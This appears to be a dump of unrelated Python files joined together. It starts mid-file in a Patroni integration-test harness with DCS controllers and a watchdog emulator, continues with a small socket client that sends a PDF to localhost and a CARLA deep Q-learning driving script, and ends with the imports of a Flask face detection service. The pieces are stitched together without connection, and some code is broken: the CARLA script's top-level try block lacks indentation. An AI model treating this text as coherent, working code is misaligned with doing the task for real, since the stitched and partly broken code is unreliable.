        metadata = self._client.V1ObjectMeta(namespace=self._namespace, name=name, labels=labels)
        spec = self._client.V1PodSpec(containers=[self._client.V1Container(name=name, image='empty')])
        body = self._client.V1Pod(metadata=metadata, spec=spec)
        self._api.create_namespaced_pod(self._namespace, body)

    def delete_pod(self, name):
        """Delete *name* and wait until the API no longer reports it."""
        try:
            self._api.delete_namespaced_pod(name, self._namespace, self._client.V1DeleteOptions())
        # FIX: bare `except:` would also swallow SystemExit/KeyboardInterrupt.
        except Exception:
            pass
        while True:
            try:
                self._api.read_namespaced_pod(name, self._namespace)
            except Exception:
                # read failing means the pod is finally gone
                break
            time.sleep(1)  # FIX: avoid busy-spinning the API server

    def query(self, key, scope='batman'):
        if key.startswith('members/'):
            pod = self._api.read_namespaced_pod(key[8:], self._namespace)
            return (pod.metadata.annotations or {}).get('status', '')
        else:
            try:
                e = self._api.read_namespaced_endpoints(scope + ('' if key == 'leader' else '-' + key), self._namespace)
                if key == 'leader':
                    return e.metadata.annotations[key]
                else:
                    return json.dumps(e.metadata.annotations)
            except Exception:
                return None

    def cleanup_service_tree(self):
        """Best-effort removal of all test pods and endpoints."""
        try:
            self._api.delete_collection_namespaced_pod(self._namespace, label_selector=self._label_selector)
        except Exception:
            pass
        try:
            self._api.delete_collection_namespaced_endpoints(self._namespace, label_selector=self._label_selector)
        except Exception:
            pass
        while True:
            result = self._api.list_namespaced_pod(self._namespace, label_selector=self._label_selector)
            if len(result.items) < 1:
                break
            time.sleep(1)  # FIX: avoid busy-spinning while pods terminate

    def _is_running(self):
        # The external cluster is assumed available.
        return True
class ZooKeeperController(AbstractDcsController):
    """ handles all zookeeper related tasks, used for the tests setup and cleanup """

    def __init__(self, context, export_env=True):
        # export_env=False lets ExhibitorController reuse this class while
        # exporting its own environment variables.
        super(ZooKeeperController, self).__init__(context, False)
        if export_env:
            os.environ['PATRONI_ZOOKEEPER_HOSTS'] = "'localhost:2181'"
        self._client = kazoo.client.KazooClient()

    def _start(self):
        pass  # TODO: implement later

    def query(self, key, scope='batman'):
        """Return the value stored at *key*, or None when it doesn't exist."""
        try:
            return self._client.get(self.path(key, scope))[0].decode('utf-8')
        except kazoo.exceptions.NoNodeError:
            return None

    def cleanup_service_tree(self):
        try:
            self._client.delete(self.path(scope=''), recursive=True)
        except (kazoo.exceptions.NoNodeError):
            # Nothing to clean up.
            return
        except Exception as e:
            assert False, "exception when cleaning up zookeeper contents: {0}".format(e)

    def _is_running(self):
        # if zookeeper is running, but we didn't start it
        if self._client.connected:
            return True
        try:
            # start(1) raises on timeout; `or True` maps success to True.
            return self._client.start(1) or True
        except Exception:
            return False
class ExhibitorController(ZooKeeperController):
    """ZooKeeper reached through an Exhibitor REST endpoint on localhost."""

    def __init__(self, context):
        # Skip the parent's env export; Exhibitor uses its own variables.
        super(ExhibitorController, self).__init__(context, False)
        os.environ['PATRONI_EXHIBITOR_HOSTS'] = 'localhost'
        os.environ['PATRONI_EXHIBITOR_PORT'] = '8181'
class PatroniPoolController(object):
    """Creates, tracks, and proxies calls to a pool of PatroniControllers."""

    BACKUP_SCRIPT = 'features/backup_create.sh'

    def __init__(self, context):
        self._context = context
        self._dcs = None
        self._output_dir = None
        self._patroni_path = None
        self._processes = {}  # name -> PatroniController
        self.create_and_set_output_directory('')
        # Every concrete AbstractDcsController subclass, keyed by short name.
        self.known_dcs = {subclass.name(): subclass for subclass in AbstractDcsController.get_subclasses()}

    @property
    def patroni_path(self):
        # Walk up from this file until leaving the 'features' directory;
        # that parent is the project root.
        if self._patroni_path is None:
            cwd = os.path.realpath(__file__)
            while True:
                cwd, entry = os.path.split(cwd)
                if entry == 'features' or cwd == '/':
                    break
            self._patroni_path = cwd
        return self._patroni_path

    @property
    def output_dir(self):
        return self._output_dir

    def start(self, name, max_wait_limit=20, custom_config=None):
        """Start (creating on first use) the Patroni instance called *name*."""
        if name not in self._processes:
            self._processes[name] = PatroniController(self._context, name, self.patroni_path,
                                                      self._output_dir, custom_config)
        self._processes[name].start(max_wait_limit)

    def __getattr__(self, func):
        # Proxy a whitelisted set of PatroniController methods so behave
        # steps can write e.g. pctl.query('postgres0', ...).
        if func not in ['stop', 'query', 'write_label', 'read_label', 'check_role_has_changed_to', 'add_tag_to_config',
                        'get_watchdog', 'database_is_running', 'checkpoint_hang', 'patroni_hang',
                        'terminate_backends', 'backup']:
            raise AttributeError("PatroniPoolController instance has no attribute '{0}'".format(func))

        def wrapper(name, *args, **kwargs):
            return getattr(self._processes[name], func)(*args, **kwargs)
        return wrapper

    def stop_all(self):
        for ctl in self._processes.values():
            ctl.cancel_background()
            ctl.stop()
        self._processes.clear()

    def create_and_set_output_directory(self, feature_name):
        """(Re)create a per-feature output directory and make it current."""
        feature_dir = os.path.join(self.patroni_path, 'features/output', feature_name.replace(' ', '_'))
        if os.path.exists(feature_dir):
            shutil.rmtree(feature_dir)
        os.makedirs(feature_dir)
        self._output_dir = feature_dir

    def clone(self, from_name, cluster_name, to_name):
        """Bootstrap *to_name* via pg_basebackup from *from_name*."""
        f = self._processes[from_name]
        custom_config = {
            'scope': cluster_name,
            'bootstrap': {
                'method': 'pg_basebackup',
                'pg_basebackup': {
                    'command': self.BACKUP_SCRIPT + ' --walmethod=stream --dbname=' + f.backup_source
                },
                'dcs': {
                    'postgresql': {
                        'parameters': {
                            'max_connections': 101
                        }
                    }
                }
            },
            'postgresql': {
                'parameters': {
                    'archive_mode': 'on',
                    'archive_command': 'mkdir -p {0} && test ! -f {0}/%f && cp %p {0}/%f'.format(
                        os.path.join(self._output_dir, 'wal_archive'))
                },
                'authentication': {
                    'superuser': {'password': 'zalando1'},
                    'replication': {'password': 'rep-pass1'}
                }
            }
        }
        self.start(to_name, custom_config=custom_config)

    def bootstrap_from_backup(self, name, cluster_name):
        """Bootstrap *name* by restoring a previously created base backup."""
        custom_config = {
            'scope': cluster_name,
            'bootstrap': {
                'method': 'backup_restore',
                'backup_restore': {
                    'command': 'features/backup_restore.sh --sourcedir=' + os.path.join(self._output_dir, 'basebackup'),
                    'recovery_conf': {
                        'recovery_target_action': 'promote',
                        'recovery_target_timeline': 'latest',
                        'restore_command': 'cp {0}/wal_archive/%f %p'.format(self._output_dir)
                    }
                }
            },
            'postgresql': {
                'authentication': {
                    'superuser': {'password': 'zalando2'},
                    'replication': {'password': 'rep-pass2'}
                }
            }
        }
        self.start(name, custom_config=custom_config)

    @property
    def dcs(self):
        # Resolved once from the DCS environment variable (default: etcd).
        if self._dcs is None:
            self._dcs = os.environ.pop('DCS', 'etcd')
            assert self._dcs in self.known_dcs, 'Unsupported dcs: ' + self._dcs
        return self._dcs
class WatchdogMonitor(object):
    """Testing harness for emulating a watchdog device as a named pipe. Because we can't easily emulate ioctl's we
    require a custom driver on Patroni side. The device takes no action, only notes if it was pinged and/or triggered.

    Protocol (single bytes read from the fifo):
      b'1' -> keepalive ping, b'V' -> magic close, b'X' -> harness stop request,
      b'C' -> followed by a newline-terminated command (currently ``timeout=N``).
    """

    def __init__(self, name, work_directory, output_dir):
        self.fifo_path = os.path.join(work_directory, 'data', 'watchdog.{0}.fifo'.format(name))
        self.fifo_file = None
        self._stop_requested = False  # Relying on bool setting being atomic
        self._thread = None
        self.last_ping = None
        self.was_pinged = False
        self.was_closed = False
        self._was_triggered = False
        # seconds without a ping after which the watchdog counts as triggered
        self.timeout = 60
        self._log_file = open(os.path.join(output_dir, 'watchdog.{0}.log'.format(name)), 'w')
        self._log("watchdog {0} initialized".format(name))

    def _log(self, msg):
        # Timestamped line in the per-watchdog log file (not flushed here).
        tstamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S,%f")
        self._log_file.write("{0}: {1}\n".format(tstamp, msg))

    def start(self):
        """(Re)create the fifo and start the reader thread."""
        assert self._thread is None
        self._stop_requested = False
        self._log("starting fifo {0}".format(self.fifo_path))
        fifo_dir = os.path.dirname(self.fifo_path)
        if os.path.exists(self.fifo_path):
            os.unlink(self.fifo_path)
        elif not os.path.exists(fifo_dir):
            os.mkdir(fifo_dir)
        os.mkfifo(self.fifo_path)
        self.last_ping = time.time()
        self._thread = threading.Thread(target=self.run)
        self._thread.start()

    def run(self):
        """Reader loop: accept fifo connections and interpret the byte protocol."""
        try:
            while not self._stop_requested:
                self._log("opening")
                # os.open blocks until a writer (Patroni's driver) connects.
                self.fifo_file = os.open(self.fifo_path, os.O_RDONLY)
                try:
                    self._log("Fifo {0} connected".format(self.fifo_path))
                    self.was_closed = False
                    while not self._stop_requested:
                        c = os.read(self.fifo_file, 1)
                        if c == b'X':
                            self._log("Stop requested")
                            return
                        elif c == b'':
                            # EOF: the writer side closed the pipe.
                            self._log("Pipe closed")
                            break
                        elif c == b'C':
                            # Read a newline-terminated command string.
                            command = b''
                            c = os.read(self.fifo_file, 1)
                            while c != b'\n' and c != b'':
                                command += c
                                c = os.read(self.fifo_file, 1)
                            command = command.decode('utf8')
                            if command.startswith('timeout='):
                                self.timeout = int(command.split('=')[1])
                                self._log("timeout={0}".format(self.timeout))
                        elif c in [b'V', b'1']:
                            cur_time = time.time()
                            # A ping arriving later than the timeout means the
                            # (emulated) watchdog would already have fired.
                            if cur_time - self.last_ping > self.timeout:
                                self._log("Triggered")
                                self._was_triggered = True
                            if c == b'V':
                                self._log("magic close")
                                self.was_closed = True
                            elif c == b'1':
                                self.was_pinged = True
                                self._log("ping after {0} seconds".format(cur_time - (self.last_ping or cur_time)))
                            self.last_ping = cur_time
                        else:
                            self._log('Unknown command {0} received from fifo'.format(c))
                finally:
                    self.was_closed = True
                    self._log("closing")
                    os.close(self.fifo_file)
        except Exception as e:
            self._log("Error {0}".format(e))
        finally:
            self._log("stopping")
            self._log_file.flush()
            if os.path.exists(self.fifo_path):
                os.unlink(self.fifo_path)

    def stop(self):
        """Ask the reader thread to exit (by writing b'X' into the fifo) and join it."""
        self._log("Monitor stop")
        self._stop_requested = True
        try:
            if os.path.exists(self.fifo_path):
                fd = os.open(self.fifo_path, os.O_WRONLY)
                os.write(fd, b'X')
                os.close(fd)
        except Exception as e:
            self._log("err while closing: {0}".format(str(e)))
        if self._thread:
            self._thread.join()
            self._thread = None

    def reset(self):
        # Clear per-scenario observation flags; timeout/last_ping are kept.
        self._log("reset")
        self.was_pinged = self.was_closed = self._was_triggered = False

    @property
    def was_triggered(self):
        """True if the watchdog fired, or would fire now on a still-open device."""
        delta = time.time() - self.last_ping
        triggered = self._was_triggered or not self.was_closed and delta > self.timeout
        self._log("triggered={0}, {1}s left".format(triggered, self.timeout - delta))
        return triggered
# actions to execute on start/stop of the tests and before running individual features
def before_all(context):
    """Global behave hook: start the DCS and prepare the Patroni pool controller."""
    os.environ.update({'PATRONI_RESTAPI_USERNAME': 'username', 'PATRONI_RESTAPI_PASSWORD': 'password'})
    # CI detection selects more generous timeouts for slow build machines.
    context.ci = 'TRAVIS_BUILD_NUMBER' in os.environ or 'BUILD_NUMBER' in os.environ
    context.timeout_multiplier = 2 if context.ci else 1
    context.pctl = PatroniPoolController(context)
    context.dcs_ctl = context.pctl.known_dcs[context.pctl.dcs](context)
    context.dcs_ctl.start()
    try:
        context.dcs_ctl.cleanup_service_tree()
    except AssertionError:  # after_all handlers won't be executed in before_all
        context.dcs_ctl.stop()
        raise
def after_all(context):
    """Tear down the DCS controller, then merge and print coverage results."""
    context.dcs_ctl.stop()
    for coverage_cmd in ('combine', 'report'):
        subprocess.call([sys.executable, '-m', 'coverage', coverage_cmd])
def before_feature(context, feature):
    """Provision a fresh per-feature directory collecting Patroni and
    PostgreSQL logs for this feature run."""
    pool = context.pctl
    pool.create_and_set_output_directory(feature.name)
def after_feature(context, feature):
    """ stop all Patronis, remove their data directory and cleanup the keys in etcd """
    context.pctl.stop_all()
    shutil.rmtree(os.path.join(context.pctl.patroni_path, 'data'))
    context.dcs_ctl.cleanup_service_tree()
    # Preserve the collected output of a failed feature for post-mortem analysis.
    if feature.status == 'failed':
        shutil.copytree(context.pctl.output_dir, context.pctl.output_dir + '_failed')
|
client.py | import asyncore
import socket
import json
import threading
# Address of the file-receiving server this client pushes data to.
server_address = ("127.0.0.1", 5920)


class Client(asyncore.dispatcher):
    """Minimal asyncore TCP client: connects on construction and prints any
    server response.

    NOTE(review): asyncore is deprecated since Python 3.6 and removed in
    3.12 -- port to asyncio/socket if this script must keep working.
    """

    def __init__(self):
        asyncore.dispatcher.__init__(self)
        self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connect(server_address)

    def handle_read(self):
        # Echo whatever the server sends (up to 8 KiB per read) to stdout.
        data = self.recv(8192)
        print(data)
# Run the asyncore event loop on a background thread, then push the PDF
# file's raw bytes to the connected server.
client = Client()
client_thread = threading.Thread(target=asyncore.loop)
# BUG FIX: the original wrote ``client_thread.setDaemon = False``, which only
# shadowed the setDaemon() method with a bool and changed nothing. Assign the
# ``daemon`` attribute (must be set before start()) to express the intent.
client_thread.daemon = False
client_thread.start()

filename = 'pdf_file.pdf'
with open(filename, 'r+b') as fp:
    # data = {'filename': filename, 'file_data': fp.read()}
    client.send(fp.read())
|
refined_dqn.py | #!/usr/bin/env python3
import glob
import os
import sys
import random
import time
import sys
import numpy as np
import cv2
import math
from collections import deque
import tensorflow as tf
# from keras.applications.xception import Xception
from keras.layers import Dense, GlobalAveragePooling2D, Flatten
from tensorflow.keras.optimizers import Adam
from keras.models import Model
from keras.callbacks import TensorBoard
import tensorflow.keras.backend as backend
from threading import Thread
from tqdm import tqdm
import matplotlib.pyplot as plt
"Starting script for any carla programming"
try:
sys.path.append(glob.glob('../carla/dist/carla-*%d.%d-%s.egg' % (
sys.version_info.major,
sys.version_info.minor,
'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])
except IndexError:
pass
import carla
IM_WIDTH = 640
IM_HEIGHT = 480
SECONDS_PER_EPISODE = 20
REPLAY_MEMORY_SIZE = 5_000
MIN_REPLAY_MEMORY_SIZE = 1_000
MINIBATCH_SIZE = 16
PREDICTION_BATCH_SIZE = 1
TRAINING_BATCH_SIZE = MINIBATCH_SIZE // 4
UPDATE_TARGET_EVERY = 5 #used to be 10
MODEL_NAME = "Xception"
MEMORY_FRACTION = 0.8
MIN_REWARD = -200
EPISODES = 1000
DISCOUNT = 0.99
epsilon = 1
EPSILON_DECAY = 0.995 ## 0.9975 99975
MIN_EPSILON = 0.001
AGGREGATE_STATS_EVERY = 5 ## checking per 5 episodes
SHOW_PREVIEW = True ## for debugging purpose
class CarEnv:
    """Gym-style wrapper around a CARLA simulator client.

    reset() spawns a Tesla Model 3 plus RGB camera and collision sensors,
    step() applies a steering action and returns (camera frame, reward,
    done, info).
    """
    SHOW_CAM = SHOW_PREVIEW
    STEER_AMT = 1.0 ## full turn for every single time
    im_width = IM_WIDTH
    im_height = IM_HEIGHT
    front_camera = None  # latest RGB frame, filled asynchronously by process_img()

    def __init__(self):
        self.client = carla.Client('127.0.0.1', 2000)
        self.client.set_timeout(2.0)
        # self.actor = carla.Actor
        self.world = self.client.load_world('Town04')
        self.map = self.world.get_map() ## added for map creating
        self.blueprint_library = self.world.get_blueprint_library()
        # weather = carla.WeatherParameters(
        #     cloudyness=10.0,
        #     precipitation=10.0,
        #     sun_altitude_angle=90.0)
        # self.world.set_weather(weather)
        self.model_3 = self.blueprint_library.filter("model3")[0] ## grab tesla model3 from library

    def reset(self):
        """Spawn vehicle + sensors on road 10 and return the first camera frame."""
        self.collision_hist = []
        self.actor_list = []
        self.waypoints = self.client.get_world().get_map().generate_waypoints(distance=3.0)
        self.filtered_waypoints = [] ## chaned
        i = 0
        # Keep only the waypoints belonging to road 10 and draw them for debugging.
        for self.waypoint in self.waypoints:
            if(self.waypoint.road_id == 10):
                self.filtered_waypoints.append(self.waypoint)
        for i in range(len(self.filtered_waypoints)):
            self.world.debug.draw_string(self.filtered_waypoints[i].transform.location, 'O', draw_shadow=False,
                                         color=carla.Color(r=0, g=255, b=0), life_time=40,
                                         persistent_lines=True)
            i = i+1
        self.spawn_point = self.filtered_waypoints[1].transform
        # Lift the spawn point to avoid spawning inside the road surface.
        self.spawn_point.location.z += 2
        self.vehicle = self.world.spawn_actor(self.model_3, self.spawn_point) ## changed for adding waypoints
        # self.spawn_points = self.map.get_spawn_points()
        # self.vehicle = self.world.spawn_actor(self.model_3, self.spawn_points) ## changed for adding waypoints
        # self.waypoint = self.map.get_waypoint(self.vehicle.get_location())
        # self.vehicle.set_simulate_physics(False)
        # self.world.debug.draw_string(self.waypoint.transform.location, 'O', draw_shadow=False,
        #                              color=carla.Color(r=0, g=255, b=0), life_time=40,
        #                              persistent_lines=True)
        # while True:
        #     # Find next waypoint 2 meters ahead.
        #     self.waypoint = random.choice(self.waypoint.next(20.0))
        #     # Teleport the vehicle.
        #     self.vehicle.set_transform(self.waypoint.transform)
        # self.transform = random.choice(self.world.get_map().get_spawn_points())
        # self.vehicle = self.world.spawn_actor(self.model_3, self.transform)
        self.actor_list.append(self.vehicle)
        self.rgb_cam = self.blueprint_library.find('sensor.camera.rgb')
        self.rgb_cam.set_attribute("image_size_x", f"{self.im_width}")
        self.rgb_cam.set_attribute("image_size_y", f"{self.im_height}")
        self.rgb_cam.set_attribute("fov", f"110") ## fov, field of view
        transform = carla.Transform(carla.Location(x=2.5, z=0.7))
        self.sensor = self.world.spawn_actor(self.rgb_cam, transform, attach_to=self.vehicle)
        self.actor_list.append(self.sensor)
        self.sensor.listen(lambda data: self.process_img(data))
        self.vehicle.apply_control(carla.VehicleControl(throttle=0.0, brake=0.0)) # initially passing some commands seems to help with time. Not sure why.
        time.sleep(4) # sleep to get things started and to not detect a collision when the car spawns/falls from sky.
        colsensor = self.world.get_blueprint_library().find('sensor.other.collision')
        self.colsensor = self.world.spawn_actor(colsensor, transform, attach_to=self.vehicle)
        self.actor_list.append(self.colsensor)
        self.colsensor.listen(lambda event: self.collision_data(event))
        # Block until the camera callback delivered the first frame.
        while self.front_camera is None: ## return the observation
            time.sleep(0.01)
        self.episode_start = time.time()
        self.vehicle.apply_control(carla.VehicleControl(brake=0.0, throttle=0.0))
        return self.front_camera

    def collision_data(self, event):
        # Collision sensor callback; any entry here means a crash happened.
        self.collision_hist.append(event)

    def process_img(self, image):
        """Camera callback: convert raw BGRA bytes to a BGR array and cache it."""
        i = np.array(image.raw_data)
        #np.save("iout.npy", i)
        i2 = i.reshape((self.im_height, self.im_width, 4))
        i3 = i2[:, :, :3]  # drop the alpha channel
        if self.SHOW_CAM:
            cv2.imshow("",i3)
            cv2.waitKey(1)
        self.front_camera = i3 ## remember to scale this down between 0 and 1 for CNN input purpose

    def step(self, action):
        '''
        For now let's just pass steer left, straight, right
        0, 1, 2
        '''
        if action == 0:
            self.vehicle.apply_control(carla.VehicleControl(throttle=1.0, steer= 0.0 ))
        if action == 1:
            self.vehicle.apply_control(carla.VehicleControl(throttle=1.0, steer=1.0*self.STEER_AMT))
        if action == 2:
            self.vehicle.apply_control(carla.VehicleControl(throttle=1.0, steer=-1.0*self.STEER_AMT))
        v = self.vehicle.get_velocity()
        kmh = int(3.6 * math.sqrt(v.x**2 + v.y**2 + v.z**2))
        # if len(self.collision_hist) != 0:
        #     done = True
        #     reward = -200
        # elif kmh < 50:
        #     done = False
        #     reward = -1
        # elif carla.Location.distance(self, self.waypoint) == 0:
        #     done = False
        #     reward = 150
        # else:
        #     done = False
        #     reward = 10
        # if self.episode_start + SECONDS_PER_EPISODE < time.time(): ## when to stop
        #     done = True
        # return self.front_camera, reward, done, None
        # NOTE(review): this loop overwrites reward/done on every iteration, so
        # only the *last* waypoint effectively decides the reward; the
        # distance == 0 comparison will also almost never be exactly true for
        # floats. Confirm whether a per-waypoint accumulation was intended.
        i = 2
        for i in range(2, len(self.filtered_waypoints)):
            if len(self.collision_hist) != 0:
                done = True
                reward = -300
            elif kmh < 30:
                done = False
                reward = -5
            elif carla.Location.distance(carla.Actor.get_location(self.actor_list[0]), self.filtered_waypoints[i].transform.location) == 0:
                done = False
                reward = 25
            else:
                done = False
                reward = 30
            i = i + 1
        if self.episode_start + SECONDS_PER_EPISODE < time.time(): ## when to stop
            done = True
        return self.front_camera, reward, done, None
class DQNAgent:
    """DQN agent with a separate target network and experience replay.

    ``model`` is trained every loop iteration; ``target_model`` provides the
    bootstrap Q-targets and is synchronised every UPDATE_TARGET_EVERY logged
    episodes. Training runs on a background thread via train_in_loop().
    """

    def __init__(self):
        # replay_memory remembers the last REPLAY_MEMORY_SIZE transitions; we
        # fit the model on random samples drawn from it.
        self.replay_memory = deque(maxlen=REPLAY_MEMORY_SIZE)
        self.tensorboard = ModifiedTensorBoard(log_dir=f"logs/{MODEL_NAME}-{int(time.time())}")
        self.target_update_counter = 0  # tracks when to update the target model
        self.model = self.create_model()
        # Target model: this is what we .predict against every step.
        self.target_model = self.create_model()
        self.target_model.set_weights(self.model.get_weights())
        self.terminate = False  # set externally to stop train_in_loop()
        self.last_logged_episode = 0
        self.training_initialized = False  # waiting for TF to get rolling

    def create_model(self):
        """Build a frozen ResNet50 feature extractor with a 3-unit linear Q head."""
        base_model = tf.keras.applications.ResNet50(weights='imagenet', include_top=False, input_shape=(480, 640, 3))
        base_model.trainable = False  # only the dense head is trained
        inputs = tf.keras.Input(shape=(480, 640, 3))
        x = base_model(inputs, training=False)
        x = tf.keras.layers.GlobalAveragePooling2D()(x)
        x = tf.keras.layers.Flatten()(x)
        x = tf.keras.layers.Dense(units=40, activation='relu')(x)
        # Output layer: one linear Q-value per action (left/straight/right).
        output = tf.keras.layers.Dense(units=3, activation='linear')(x)
        model = tf.keras.Model(inputs, output)
        model.compile(loss='mse', optimizer=tf.keras.optimizers.Adam(learning_rate=0.001))
        # BUG FIX: original printed the bound method (print(model.summary));
        # call it so the architecture summary is actually emitted.
        print(model.summary())
        return model

    def update_replay_memory(self, transition):
        """Store one transition: (current_state, action, reward, new_state, done)."""
        self.replay_memory.append(transition)

    def train(self):
        """Fit the online model on one random minibatch from replay memory."""
        # Start training only once enough samples have accumulated.
        if len(self.replay_memory) < MIN_REPLAY_MEMORY_SIZE:
            return
        minibatch = random.sample(self.replay_memory, MINIBATCH_SIZE)
        # Normalise image states to [0, 1] and query current/future Q-values.
        current_states = np.array([transition[0] for transition in minibatch]) / 255
        current_qs_list = self.model.predict(current_states, PREDICTION_BATCH_SIZE)
        new_current_states = np.array([transition[3] for transition in minibatch]) / 255
        future_qs_list = self.target_model.predict(new_current_states, PREDICTION_BATCH_SIZE)
        X = []  # image states (network input)
        y = []  # updated Q-value targets (network output)
        for index, (current_state, action, reward, new_state, done) in enumerate(minibatch):
            if not done:
                # Bellman update using the target network's best future Q.
                max_future_q = np.max(future_qs_list[index])
                new_q = reward + DISCOUNT * max_future_q
            else:
                new_q = reward
            current_qs = current_qs_list[index]
            current_qs[action] = new_q  # only the taken action's Q changes
            X.append(current_state)
            y.append(current_qs)
        # Log once per episode, not per training step.
        log_this_step = False
        if self.tensorboard.step > self.last_logged_episode:
            log_this_step = True
            # BUG FIX: original assigned self.last_log_episode (a typo), so
            # last_logged_episode never advanced and this gate fired forever.
            self.last_logged_episode = self.tensorboard.step
        self.model.fit(np.array(X) / 255, np.array(y), batch_size=TRAINING_BATCH_SIZE, verbose=0,
                       shuffle=False, callbacks=[self.tensorboard] if log_this_step else None)
        if log_this_step:
            self.target_update_counter += 1
        # If the counter reaches the set value, copy the online weights across.
        if self.target_update_counter > UPDATE_TARGET_EVERY:
            self.target_model.set_weights(self.model.get_weights())
            self.target_update_counter = 0

    def get_qs(self, state):
        """Return the Q-values for a single (unnormalised) image state."""
        return self.model.predict(np.array(state).reshape(-1, *state.shape) / 255)[0]

    def train_in_loop(self):
        """Background-thread entry point: warm up TF with a dummy fit, then train forever."""
        # First fit on nonsense data: the initial fit/predict is slow, so get
        # it out of the way before real episodes start.
        X = np.random.uniform(size=(1, IM_HEIGHT, IM_WIDTH, 3)).astype(np.float32)
        y = np.random.uniform(size=(1, 3)).astype(np.float32)
        self.model.fit(X, y, verbose=False, batch_size=1)
        self.training_initialized = True
        while True:
            if self.terminate:
                return
            self.train()
            time.sleep(0.01)
class ModifiedTensorBoard(TensorBoard):
    """TensorBoard callback variant that keeps ONE writer and step counter
    across many short .fit() calls, instead of restarting at step 0 each fit.
    """

    # Overriding init to set initial step and writer (we want one log file for all .fit() calls)
    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.step = 1
        # BUG FIX: the original passed the literal string 'self.log_dir',
        # creating a directory literally named "self.log_dir"; pass the
        # attribute value so logs land in the configured log_dir.
        self.writer = tf.summary.create_file_writer(self.log_dir)

    # Overriding this method to stop creating default log writer
    def set_model(self, model):
        pass

    # Overrided, saves logs with our step number
    # (otherwise every .fit() will start writing from 0th step)
    def on_epoch_end(self, epoch, logs=None):
        self.update_stats(**(logs or {}))

    # Overrided
    # We train for one batch only, no need to save anything at epoch end
    def on_batch_end(self, batch, logs=None):
        pass

    # Overrided, so won't close writer
    def on_train_end(self, _):
        pass

    def _write_logs(self, logs, index):
        """Write each metric as a scalar at *index*, then advance our step."""
        with self.writer.as_default():
            for name, value in logs.items():
                tf.summary.scalar(name, value, step=index)
            self.step += 1
        self.writer.flush()

    # Custom method for saving own metrics
    # Creates writer, writes custom metrics and closes writer
    def update_stats(self, **stats):
        self._write_logs(stats, self.step)
if __name__ == '__main__':
    # Main training driver: epsilon-greedy episode loop with a background
    # training thread; stats are aggregated every AGGREGATE_STATS_EVERY episodes.
    FPS = 20
    # For stats
    ep_rewards = [-200]
    # For more repetitive results
    random.seed(1)
    np.random.seed(1)
    tf.random.set_seed(1)
    # Memory fraction, used mostly when training multiple agents
    # gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=MEMORY_FRACTION)
    # backend.set_session(tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)))
    # Create models folder, this is where the model will go
    if not os.path.isdir('models'):
        os.makedirs('models')
    # Create agent and environment
    agent = DQNAgent()
    env = CarEnv()
    # Start training thread and wait for training to be initialized
    trainer_thread = Thread(target=agent.train_in_loop, daemon=True)
    trainer_thread.start()
    while not agent.training_initialized:
        time.sleep(0.01)
    # Warm up prediction once so the first real step isn't slow.
    agent.get_qs(np.ones((env.im_height, env.im_width, 3)))
    rewards = []
    episode_list = []
    # Iterate over episodes
    for episode in tqdm(range(1, EPISODES + 1), unit='episodes'):
        #try:
        env.collision_hist = []
        # Update tensorboard step every episode
        agent.tensorboard.step = episode
        # Restarting episode - reset episode reward and step number
        episode_reward = 0
        step = 1
        # Reset environment and get initial state
        current_state = env.reset()
        # Reset flag and start iterating until episode ends
        done = False
        episode_start = time.time()
        # Play for given number of seconds only
        while True:
            # np.random.random() will give us the random number between 0 and 1. If this number is greater than our randomness variable,
            # we will get Q values based on training, but otherwise, we will go random actions.
            if np.random.random() > epsilon:
                # Get action from Q table
                action = np.argmax(agent.get_qs(current_state))
            else:
                # Get random action
                action = np.random.randint(0, 3)
                # This takes no time, so we add a delay matching 60 FPS (prediction above takes longer)
                time.sleep(1/FPS)
            new_state, reward, done, _ = env.step(action)
            # Transform new continous state to new discrete state and count reward
            episode_reward += reward
            # Every step we update replay memory
            agent.update_replay_memory((current_state, action, reward, new_state, done))
            current_state = new_state
            step += 1
            if done:
                break
        episode_list.append(episode)
        rewards.append(episode_reward)
        # End of episode - destroy agents
        for actor in env.actor_list:
            actor.destroy()
        # Append episode reward to a list and log stats (every given number of episodes)
        ep_rewards.append(episode_reward)
        if not episode % AGGREGATE_STATS_EVERY or episode == 1: ## every show_stats_every, which is 10 right now, show and save teh following
            average_reward = sum(ep_rewards[-AGGREGATE_STATS_EVERY:])/len(ep_rewards[-AGGREGATE_STATS_EVERY:])
            min_reward = min(ep_rewards[-AGGREGATE_STATS_EVERY:])
            max_reward = max(ep_rewards[-AGGREGATE_STATS_EVERY:])
            agent.tensorboard.update_stats(reward_avg=average_reward, reward_min=min_reward, reward_max=max_reward, epsilon=epsilon)
            # Save model, but only when min reward is greater or equal a set value
            if average_reward >= -100:
                agent.model.save('models/rlmodel')
        # Decay epsilon
        if epsilon > MIN_EPSILON:
            epsilon *= EPSILON_DECAY
            epsilon = max(MIN_EPSILON, epsilon)
    # Plot the per-episode rewards once training finishes.
    #plt.figure(1)
    plt.xlabel('Episodes')
    plt.ylabel('Rewards')
    plt.title('Figure 2: Average Rewards over Episodes')
    plt.plot(episode_list, rewards)
    plt.savefig('_out/reward_graph.png')
    # Set termination flag for training thread and wait for it to finish
    agent.terminate = True
    trainer_thread.join()
    # agent.model.save('models/rlmodel')
face_detection_service.py | # MIT License
#
# Copyright (c) 2019 Onur Dundar
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from flask import Flask, request, jsonify, make_response, redirect
import logging
import sys
import optparse
import time
import cv2 as cv
import asyncio
import threading
